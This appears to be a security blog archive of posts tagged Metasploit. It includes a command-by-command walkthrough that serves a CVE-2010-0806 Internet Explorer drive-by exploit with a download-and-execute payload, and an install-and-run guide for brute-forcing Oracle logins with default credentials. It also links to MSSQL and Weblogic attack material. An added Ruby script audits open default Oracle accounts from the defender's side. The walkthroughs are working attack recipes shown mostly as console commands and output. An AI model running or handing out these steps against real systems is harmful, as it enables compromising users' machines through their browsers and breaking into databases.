Posts tagged Metasploit

On generating the recent web-trojan (drive-by) 0day page (CVE-2010-0806) with Metasploit

1. Download http://www.rec-sec.com/exploits/msf/ie_iepeers_pointer.rb

2. Put it in C:\Metasploit\Framework3\msf3\modules\exploits\test. I renamed it to ie.rb.

3. Start msfconsole

4. msf > use exploit/test/ie

msf exploit(ie) > show options

Output:

Module options:

Name        Current Setting  Required  Description
----        ---------------  --------  -----------
SRVHOST     0.0.0.0          yes       The local host to listen on.
SRVPORT     8080             yes       The local port to listen on.
SSL         false            no        Negotiate SSL for incoming connections
SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH                      no        The URI to use for this exploit (default is random)

Exploit target:

Id  Name
--  ----
0   Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0

msf exploit(ie) > set srvhost 192.168.0.3
srvhost => 192.168.0.3
msf exploit(ie) > set srvport 8080
srvport => 8080

msf exploit(ie) > set payload windows/download_exec
payload => windows/download_exec

msf exploit(ie) > set url http://192.168.0.3/demo.exe
url => http://192.168.0.3/demo.exe
msf exploit(ie) > exploit
[*] Exploit running as background job.

msf exploit(ie) >
[*] Using URL: http://192.168.0.3:8080/4rJ0JRSnX55wAY
[*] Server started.

Then open http://192.168.0.3:8080/4rJ0JRSnX55wAY and you can see the page source.

The lines in red are the commands; everything else is output.

Source: http://hi.baidu.com/myvbscript/blog/item/c1444edf23fa3e1848540320.html

Attacking MSSQL with Metasploit

Nowadays hacking has shifted from attacking systems to learn how they work, or for the thrill of getting into a system for the sake of the hunt; many hackers are now doing it for profit. In fact, many companies and states around the world are employing hackers to gather information for both political and financial gain. One of the places where most of this information resides is in databases, and one of the most popular databases in enterprises and governments today is Microsoft SQL Server. In this blog post I will cover some of the attacks you can perform against this system with Metasploit 3.3.

More detail: http://pauldotcom.com/2009/11/attacking-mssql-with-metasploi.html

Metasploit Framework 3.3 Release Candidate 1

This 3.3 release candidate is an early snapshot of what Metasploit 3.3 will look like. We are looking for feedback from the community about the new installers, the stability of the framework itself, and the functional changes between 3.3 and earlier releases of the Metasploit Framework. The 3.3 Draft Release Notes go into detail on the new features and behaviors of this version. For a full list of bug fixes, please refer to the Redmine ChangeLog. If you are a software packager and would like to include Metasploit 3.3 in your distribution or operating system, please contact us via email at msfdev[at]metasploit.com. The final release of 3.3 should occur before the end of November. Metasploit is a Rapid7 Open Source Project.

Download and more info: https://metasploit.com/redmine/projects/framework/wiki/Release_33RC1

Installing Metasploit on Linux to brute-force Oracle login usernames and passwords

by: vitter@safechina.net
blog.securitycn.net

I have been working on Oracle lately, so here are a few small notes.

Metasploit is a very good attack toolkit, but this time I am not going to introduce the toolkit itself. The point is that MC has written many Oracle tools that I will be using a lot in the near future. I mainly use the port of the classic tnscmd tool into MSF (not as handy as the Perl version: no line breaks, so reading the output is tiring), sid_brute and login_brute; the one I use most is login_brute, for brute-forcing Oracle usernames and passwords. Below is how to install and use them, mainly the installation, because there are some things to watch out for; please note the italic text.

1. First install the gcc build environment (the server I am using is in a sorry state: minimal install, and an old system, FC2.)

rpm -ivh cpp-3.3.3-7.i386.rpm
rpm -ivh glibc-kernheaders-2.4-8.44.i386.rpm
rpm -ivh glibc-headers-2.3.3-27.i386.rpm
rpm -ivh glibc-devel-2.3.3-27.i386.rpm
rpm -ivh binutils-2.15.90.0.3-5.i386.rpm
rpm -ivh gcc-3.3.3-7.i386.rpm

2. Install the Oracle client

Download: http://www.oracle.com/technology/software/tech/oci/instantclient/htdocs/linuxsoft.html
Installing from the rpm packages is the least hassle; you can of course also download the tarball and install it by following its instructions.

rpm -ivh oracle-instantclient11.1-basic-11.1.0.7.0-1.i386.rpm oracle-instantclient11.1-devel-11.1.0.7.0-1.i386.rpm oracle-instantclient11.1-sqlplus-11.1.0.7.0-1.i386.rpm

After installing, run the following two commands, and also set them as environment variables by appending them to the end of /etc/profile:

LD_LIBRARY_PATH=/usr/lib/oracle/11.1/client/lib/
export LD_LIBRARY_PATH

3. Install ruby

Download: http://www.ruby-lang.org/en/downloads/

tar jxvf ruby-1.8.5-p231.tar.bz2 # (note: do not install the 1.9 series, otherwise MSF cannot read CSV files and fails with "NameError uninitialized constant CSV::Reader")
cd ruby-1.8.5-p231
./configure
make && make install

4. Install ruby-oci8

Installation instructions: http://ruby-oci8.rubyforge.org/en/InstallForInstantClient.html
Download: http://rubyforge.org/projects/ruby-oci8/
Either ruby-oci8-1.0.6 or ruby-oci8-2.0.0 works.
Before installing, confirm the environment variables, i.e. sqlplus must run normally:
LD_LIBRARY_PATH=/usr/lib/oracle/10.2.0.3/client/lib
export LD_LIBRARY_PATH

tar zxvf ruby-oci8-2.0.0.tar.gz
cd ruby-oci8-2.0.0
make
make install

5. Install ruby-dbi

Download: http://rubyforge.org/frs/?group_id=234
Use dbi-0.2.2, and make sure not to use anything newer than this version, otherwise MSF fails with "The dbi module is not available!".

cd dbi-0.2.2
ruby setup.rb config --with=dbi,dbd_oracle # (the --with=dbi,dbd_oracle parameter is required, otherwise you still get the dbi error)
ruby setup.rb setup
ruby setup.rb install

6. Download, install and use MSF

svn co http://metasploit.com/svn/framework3/trunk/ ./
./msfconsole

If msf complains that openssl, zlib or gem is missing, install them first.

rpm -ivh openssl-devel-0.9.7a-35.i386.rpm
cd ruby-1.8.5-p231/ext/openssl
ruby extconf.rb
make
make install

Install zlib

cd ruby-1.8.5-p231/ext/zlib
ruby extconf.rb
make
make install

Install gem

tar zxvf rubygems-1.3.1.tgz
cd rubygems-1.3.1
ruby setup.rb all

Once everything is OK you can run it (if anything else is missing, install it as requested; installing ruby modules with gem is convenient):

msf > use auxiliary/admin/oracle/login_brute
msf auxiliary(login_brute) > set RHOST 192.168.0.11
RHOST => 192.168.0.11
msf auxiliary(login_brute) > set SID oracle
SID => oracle
msf auxiliary(login_brute) > info

Name: Oracle brute forcer for known default accounts.
Version: 6876
License: Metasploit Framework License (BSD)

Provided by:
MC

Basic options:
Name     Current Setting                                          Required  Description
----     ---------------                                          --------  -----------
CSVFILE  /root/msf3/data/wordlists/oracle_default_passwords.csv  no        The file that contains a list of default accounts.
RHOST    192.168.0.11                                             yes       The Oracle host.
RPORT    1521                                                     yes       The TNS port.
SID      oracle                                                   yes       The sid to authenticate with.

Description:
This module uses a list of well known authentication credentials for
bruteforcing the TNS service. A log file of discoverd credentials
can be found in ./data/wordlists/oracle_default_found.log.

References:

https://www.metasploit.com/users/mc

http://www.petefinnigan.com/default/oracle_default_passwords.csv

msf auxiliary(login_brute) > run

The cracked credentials are saved in the file data/wordlists/oracle_default_found.log under the MSF directory.
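As an added example (not part of the original post and not Metasploit's own code), the Ruby script below ties together two points from this post: the CSV incompatibility from step 3, where the 1.8-era `CSV::Reader` API that the module relied on disappeared in Ruby 1.9 (the "uninitialized constant CSV::Reader" error), and the default-account list the login_brute module consumes, used here from the DBA's side to flag which well-known default accounts exist and are still OPEN on a database. The rows, account names and statuses are constructed sample data; it assumes the list carries the user in the first column and the password in the second, and `load_default_accounts` and `open_default_accounts` are names chosen for this example.

```ruby
require 'csv'

# Constructed sample rows in the shape of a "user,password" default-account
# list (the real file MSF ships is petefinnigan's oracle_default_passwords.csv;
# these entries are made up for the example).
SAMPLE_DEFAULTS = <<~ROWS
  SYSTEM,MANAGER
  SCOTT,TIGER
  DBSNMP,DBSNMP
  OUTLN,OUTLN
ROWS

# Parse "user,password" rows into [USER, password] pairs.
# Ruby 1.8's csv library exposed CSV::Reader; it was removed in 1.9, which is
# why MSF modules written against it failed there. This helper takes the 1.8
# path only when CSV::Reader is defined and otherwise uses CSV.parse, which
# exists in both generations of the library.
def load_default_accounts(text)
  rows = if defined?(CSV::Reader)
           out = []
           CSV::Reader.parse(text) { |row| out << row.map(&:to_s) }
           out
         else
           CSV.parse(text)
         end
  rows.reject { |r| r.nil? || r.compact.empty? }
      .map { |user, pass| [user.to_s.strip.upcase, pass.to_s.strip] }
end

# Constructed account inventory in the shape a DBA would export from
# DBA_USERS (USERNAME, ACCOUNT_STATUS).
DB_ACCOUNTS = {
  'SYSTEM'  => 'OPEN',
  'SCOTT'   => 'OPEN',
  'DBSNMP'  => 'EXPIRED & LOCKED',
  'APPUSER' => 'OPEN'
}.freeze

# Return the usernames from the default list that exist on the database and
# are still OPEN, i.e. the accounts a default-credential sweep would try
# first and that a DBA should lock or re-password.
def open_default_accounts(defaults, accounts)
  defaults.map(&:first).uniq.select { |u| accounts[u] == 'OPEN' }.sort
end

if __FILE__ == $PROGRAM_NAME
  defaults = load_default_accounts(SAMPLE_DEFAULTS)
  puts "default-account entries loaded: #{defaults.size}"
  open_default_accounts(defaults, DB_ACCOUNTS).each do |u|
    puts "OPEN default account: #{u}"
  end
end
```

Run it with `ruby audit_defaults.rb`; with the constructed data it reports SCOTT and SYSTEM as open default accounts, while DBSNMP is skipped because it is already locked.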

This is an original post on this blog; if you repost it, please credit the source: http://blog.vfocus.net. Thanks.

The Art of Microsoft Windows Attack

It is a pity I no longer teach that legendary security course; otherwise this would absolutely be a classic textbook. What do you call this? One-stop service!

http://www.milw0rm.com/papers/350

Weblogic 0day – JSESSIONID cookie value overflow

From: Sowhat
Metasploit has been updated with a 0day; bump.
Any ordinary web fuzzer should be able to find this vulnerability, I suppose.

http://trac.metasploit.com/browser/framework3/trunk/modules/exploits/windows/http/bea_weblogic_jsessionid.rb?rev=6406